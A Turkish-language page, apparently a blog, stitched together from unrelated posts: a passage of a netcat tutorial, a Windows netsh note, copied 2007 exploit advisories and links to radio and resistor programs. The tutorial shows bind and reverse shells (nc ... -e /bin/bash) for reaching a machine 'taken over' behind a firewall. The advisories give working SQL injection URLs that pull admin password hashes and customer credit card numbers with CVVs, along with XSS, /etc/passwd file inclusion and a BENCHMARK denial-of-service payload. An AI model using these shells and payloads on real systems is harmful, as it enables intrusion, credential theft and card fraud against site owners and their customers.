Peki bunu yaptık ama nedense iki tarafta da hataya benzer çıktılar aldık.

Sunucu:
10.0.1.1: inverse host lookup failed: Unknown host
connect to [10.0.1.1] from (UNKNOWN) [10.0.1.1] 33368

İstemci:
10.0.1.1: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.1.1] 5600 (?) open

Bunlar temelde Unix altındaki network komutlarının kendilerine gelen bağlantıların kaynağını kontrol etme çabasından kaynaklanıyor. Normalde hepimiz DNS'in yaptığı işi biliriz, gelen bir alan adını bir IP numarası ile eşleştirip geriden gelen paketlere yol göstermek. Buna host lookup denir. Sunucular ise bunun tam tersini yaparlar, kendilerine gelen IP numaralı istemcileri reverse lookup ile isimlere eşlerler. Eğer bir ftp/ssh/telnet vs. sunucunuz varsa ve LAN'da olmanıza rağmen her bağlantınızda cevap vermesi bir miktar zaman alıyorsa büyük ihtimalle bu reverse lookup seçeneği açık demektir.

Burada NetCat'in -n seçeneğini kullanıp bu kontrolü devredışı bırakacağız.

nc -v -w 30 -n -p 5600 -l > dosyaismi.back

ve

nc -v -w 2 -n 10.0.1.1 5600 <>

Evet bakın problem yok.

Peki diyelim dosyayı sıkıştırıp göndermek istiyorsunuz, böylece aradaki transfer süresinden kazanacaksınız. Ayrıca dosyayı sıkıştırıp göndermek de size yetmiyor öteki tarafta da otomatik olarak açılsın istiyorsunuz.

sunucu:
nc -v -w 30 -p 5600 -l < /dev/null | uncompress -c > dosyaismi.back

istemci:
compress -c <>

Burada işlemi biraz daha karmaşıklaştırmış olsak da hala anlaşılabilir sınırlar içinde tuttuk. Bir tarafta compress edilen dosya diğer tarafta açılıyor. Burada belki kafanızı karıştıracak nokta /dev/null o da hata mesajlarının gözükmemesi için.

Telnet
-------

Tamam dosya transferi gerçekleştirdik. Yaptığımız iş aslında bu tür bir çalışmada yapılacak iki temel tekniği bir araya getirmek, sunucu istemci mimarisinde bir bağlantı sağlamak. Fakat bu bağlantı sadece bir veri akışını sağlıyor, halbuki bizim tercih edeceğimiz daha işe yarar bir bağlantı belki bir telnet sunucusu gibi diğer makinada problemsizce komut çalıştırmamıza izin verecek bir bağlantı olabilirdi.

Bunun için de netcatin -e seçeneği var.

Konsol 1'de

netcat -l -p 5600 -e /bin/bash

Konsol2'de ise

nc 10.0.1.1 5600

yazdığımızda artık sanki telnetle ilk makinaya bağlanmış ve "shell"e düşmüş gibiyiz. Verdiğimiz her komutun çıktısını Konsol2'de görecek ve diğer makinaya istediğimizi yaptırabileceğiz.

Bu yöntemin en önemli problemi bize her ne kadar kolay bir erişim sağlıyor olsa da aynı derecede ciddi bir güvenlik açığını da birlikte getiriyor olmasıdır. Port taraması yapan biri bu ardına kadar açık gediği bulursa halimiz çok kötü olabilir. Ama zaten bu tür bir hızlı-pratik bağlantı (şifre bile sormuyor ;) genelde insanın pek KENDİ makinasına yapacağı bir şey de değil ;)

Reverse Telnet
---------------

Fakat hani böyle bir program varken elimizin altında insan biraz daha yaramaz bir şeyler yapmak istiyor ne bileyim hani bir tarafta bir makina olsa, bu makina öyle kabak gibi orta yerde yer almak yerine (işe yarar bütün makinalar gibi) bir firewall arkasında olsa, dışardan erişilebilecek gerçek bir IP'si dahi olmasa. Ama biz buna erişsek, login olsak, hatta login olmadan direkt girsek sorgusuz sualsiz, sonra da istediğimiz emirleri versek bu makinada bu komutlar çalışsa, sanki bir telnet istemcisi gibi... ;)

Nasıl eğlenceli geldi mi?

Eğlenceli olduğu kadar kolay, güvenlik tarafında da paranoyak bir admin gerektirecek kadar kapanması zor bir nokta bu. Bu tür bir şeyi niye yaparsınız, işyerindeki makinanız evdeki makinanın 100 katı bant genişliğine sahiptir, gece vakti kimseler yokken download başlatmak istersiniz, veya sözkonusu makina bir başkasınındır siz onu ele geçirmişsinizdir, fakat firewall arkasında olduğundan dolayı erişemiyorsunuzdur, bir işinize yaramıyordur.

Öncelikle şunu açıklığa kavuşturalım, firewall arkasında, gerçek IP'si bile olmayan bir makinaya telnet yapmak mümkün değildir ? Çünkü öncelikle bu makinanın bir ADRESİ YOKTUR. Çıkışlarını router üzerinden NAT'la yapıyordur, bu sistem bir tarafa doğru işlerken diğer tarafa doğru işlememektedir. Dahası bir IP'si bile olsa muhtemelen sistem yöneticisi 80 ve 21 gibi çok popüler ve Internet kullanıcılarına yönelik portlar dışındaki portları kapatmıştır ve sizin güzel hatırınız için de açmaz.

Eee, ama bunun yapılabileceğini söylemiştik. Şimdi de diyoruz ki bu şekilde TELNET yapılamaz! Burda çelişki yok, zira yapacağımız TELNET ama REVERSE TELNET.

Madem biz içerdeki makinaya erişemiyoruz, içerdeki makinanın bizim makinamıza erişmesini ve bizden emir beklemesini sağlayacağız bu kadar basit :)

Karışıklığa yol açmamak için şöyle bir senaryo yapalım.

evdeki makinanın ismi "ev"
işteki makinanın ismi "iş" olsun

Diyelim ki işteki makinayı bir at job ile açık bıraktık. Bu makina saat 10:01 itibariyle:

nc ev.dyndns.org 1400 -e /bin/bash

komutunu çalıştırmak üzere hazır. Sonra eve gittik, evde saat 10:00 itibariyle

nc -vv -l -p 1400

komutunu çalıştırdık.
Bu komut bilgisayarımıza diyor ki 1400 numaralı portu dinle.

Saat 10:01 itibariyle işteki makinan da at komutu sayesinde

nc ev.dyndns.org 1400 -e /bin/bash

komutunu çalıştırdığında işteki bilgisayar içerden dışarıya bir port sınırlaması olmayan firewalldan nazikçe süzülerek evdeki bilgisayarın kendisini beklemekte olan 1400 numaralı portuna bağlanır ve kendisinde (işte) /bin/bash komutunu çalıştırır.

NetCat'in çalışma mantığı doğrultusunda ev makinası iş makinasındaki bash komutunun çıktılarını alır, yazdığımız herşeyi de ona girdi olarak gönderir.

Konsol1'de nc -vv -l -p 1400 çalıştırıyoruz (bu evdeki makina gibi, dinlemeye alıyoruz bunu)

Konsol2'de nc 10.0.1.1 1400 -e /bin/bash (bu da işteki makina)

Şimdi Konsol1'de yazdığımız her işlem aslında Konsol2'de yapılıyor oldu. Bu daha önceki Telnet sunucu istemci örneğimize benziyor fakat orda çalışan bir komut yoktu, burada ise var ve yaptığı iş bir Telnet sunucusu ile neredeyse aynı (sağolsun bash)

Bu yöntemin güzel yanı ise bütün pasif bağlantılarda olduğu gibi güvenlik açığınının minimum olması. Zira bir başkasının girebileceği bağlantı bekleyen bir port yok. İçerdeki makina sizin ona daha önceden verdiğiniz IP ile bağlantı kuruyor, sadece onun ile ve belli bir zamanda. Bu da kolay kolay müdahale edilebilecek bir şey değil. Tabi bağlantının vanilla text olduğunu gözardı eder, herhangi bir ssh wrapper kullanmazsak.

Bir dezavantajımız var sizin firewallunuz dışarı herhangibir porttan çıkmaya izin vermiyor olabilir,o yüzden port olarak 80 ya da 443 gibi bir sey kullanmak gerekebilir.

Bu arada evde dialup kullanıcısı olduğumuzu varsayarsak (en kötü ihtimal :p) ev makinasının ipsinin değişken olacağını gözönüne alıp, dynamicdns gibi bir hizmet kullanmakta fayda var: http://www.dyndns.org/

PortScan
---------

Birçok özelliği bünyesinde bulunduran NetCat aynı zamanda bir port tarayıcıdır da da.
Çok basit olarak:

nc -v -w5 10.0.1.1 20-250

bize 20 ile 250 arasındaki portları bağlantı için 5 sn bekleyerek taramamızı sağlar.

Belli bir porta bağlanıp çıktısını (banner vs. gibi) almak içinse

nc -z -w10 10.0.0.1.1. 110

komutu işe yarar

Ara (soluklanın biraz)
----------------------

NetCat gibi küçük olmasına rağmen kullanımı sonsuz bir program için "Sonsöz" söylemek çok mümkün olmasa gerek, o yüzden basitçe bir ara ile bu yazıya burada bir virgül koyuyorum. Daha sayısız özellik ile sayısız network görevini NetCat ile gerçekleştirmek mümkün. Bu konuda en güzel kaynak programın yazarı olan Hobbit tarafından yazılmış olan /usr/share/doc/netcat/README.gz ve man dosyası.

D0s Ortamında Varsayılan Ağ Geçidi Değiştirmek

şimdi ip yi 10.0.0.4 olarak değiştirecem
varsayılan ağ geçidi 10.0.0.2
dns 10.0.0.2

başlat - çalıştır - cmd enter (yani xp deki dos)

netsh interface ip set address name="yerel ağ ayarları" source=static addr=10.0.0.4 mask=255.255.255.0
set address name="yerel ağ ayarları" gateway=10.0.0.2 gwmetric=1
set dns name="yerel ağ ayarları" source=static addr=10.0.0.2 register=PRIMARY

RPG Inferno v2.4 SQL Injection Vulnerability

NOTE: You'll need to be logged into the forum to access inferno.php. Increment the
limit to get the next admin (ie: [limit 0,1] [limit 1,1] [limit 2,1] etc).


EXPLOIT:
http://site.com/forum/inferno.php?do=ScanMember&id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,user(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat(username,0x3a,password,0x3a,salt),31,@@version,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/**/from/**/user/**/where/**/usergroupid=6/**/limit/**/0,1/*

Monday, July 9, 2007

SQL-Injection, local-include, xss in CartKeeper

Advisory: SQL-Injection, local-include, xss in CartKeeper

Home Page: http://www.cartkeeper.com/
Vulnerability:
SQL-injection,local-include,xss.
Vulnerable scripts: index.php,ckuser.php,display_page.php
#Xss:
http://localhost/index.php?page=5&keyword=%27&cond=[XSS]
http://localhost/index.php?page=5&keyword=">[XSS]
#Local-include:
http://localhost/ckuser.php?pg=../../../../../../../../../../etc/passwd
#Sql-injection:
http://localhost/display_page.php?i=-1+union+select+1,2,3,4/*
http://localhost/index.php?maincat=-1+or+1=1/*
#Example:
http://target/display_page.php?i=-1+union+select+1,User(),3,4/*

Sunday, July 8, 2007

SQL-Injection in Shop-Script PRO & Shop-Script Premium all ver.

Advisory : SQL-Injection in Shop-Script PRO & Shop-Script Premium all ver.
Home Page: http://shop-script.ru

Vulnerability:
SQL-injection.

Vulnerable script: admin.php
http://www.demo.shop-script.ru/premium/admin.php?dpt=custord&sub=ustlist&customer_details=order_history&customerID=1[SQL]
http://demo.shop-script.ru/premium/admin.php?dpt=conf⊂=setting&settings_groupID=-2[SQL]
http://demo.shop-script.ru/premium/admin.php?dpt=custord⊂=new_orders&orders_detailed=yes&orderID=-107[SQL]
http://shop/index.php?productID=75&discuss=true&remove_topic=-14[SQL]

http://demo.shop-script.ru/premium/admin.php?dpt=catalog&sub=discuss&productID=1114&answer=-9[SQL]
http://demo.shop-script.ru/premium/admin.php?dpt=catalog⊂=iscuss&productID=-1114[SQL]
http://demo.shop-script.ru/premium/admin.php?dpt=reports⊂=product_report&amp;categoryID=-82[SQL]
http://demo.shop-script.ru/premium/admin.php?dpt=conf⊂=zones&countryID=-1[SQL]
http://demo.shop-script.ru/pro/admin.php?dpt=conf⊂=zones&countryID=-1[SQL]

Exploit:

http://www.demo.shop-script.ru/premium/admin.php?dpt=reports⊂=
product_report&categoryID=-82+union+select+DATABASE(),null,null,null,
null,null,null/*

http://www.demo.shop-script.ru/premium/admin.php?dpt=reports⊂=
product_report&categoryID=-82+union+select+USER(),null,null,null,
null,null,null/*

http://www.demo.shop-script.ru/premium/admin.php?dpt=reports⊂=
product_report&categoryID=-82+union+select+VERSION(),null,null,null,
null,null,null/*

http://demo.shop-script.ru/premium/admin.php?dpt=reports⊂=
product_report&categoryID=-82+union+select+cc_number,cc_holdername,
cc_expires,cc_cvv,null,null,null+from+SS_orders
/*&sort=customers_rating&sort_dir=ASC

DDoS:
http://shop/admin.php?dpt=conf⊂=setting&settings_groupID=BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date)))

Vulnerability:
http://shop/admin.php?dpt=modules⊂=shipping&setting_up=2'

HTTP GET:
GET http://demo.shop-script.ru/premium/index.php?answer=1&show_price=
yes&save_voting_results=yes HTTP/1.0
Accept: */*
Referer: http://demo.shop-script.ru/premium/index.php?show_price=yes
Accept-Language: ru
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: demo.shop-script.ru
Cookie: PHPSESSID=9b93a5c8a536267b43a19262a1819c30'

TR-4000 Remote Control Program (Simulation)

http://img110.imageshack.us/img110/4267/radioyj5.png
Bu Program Radio Frekeanslarını Çok İnce Ayrıntılarına Kadar Taramanıza Yardımcı Olacaktır...!

Download

4 veya 5 renkLi Direnc iLe Kondanstör HesapLama

http://img527.imageshack.us/img527/5800/progsfh6.png

4 veya 5 renkLi Direnc iLe Kondanstör HesapLamanıza yardımcı olacak bir programcık

Download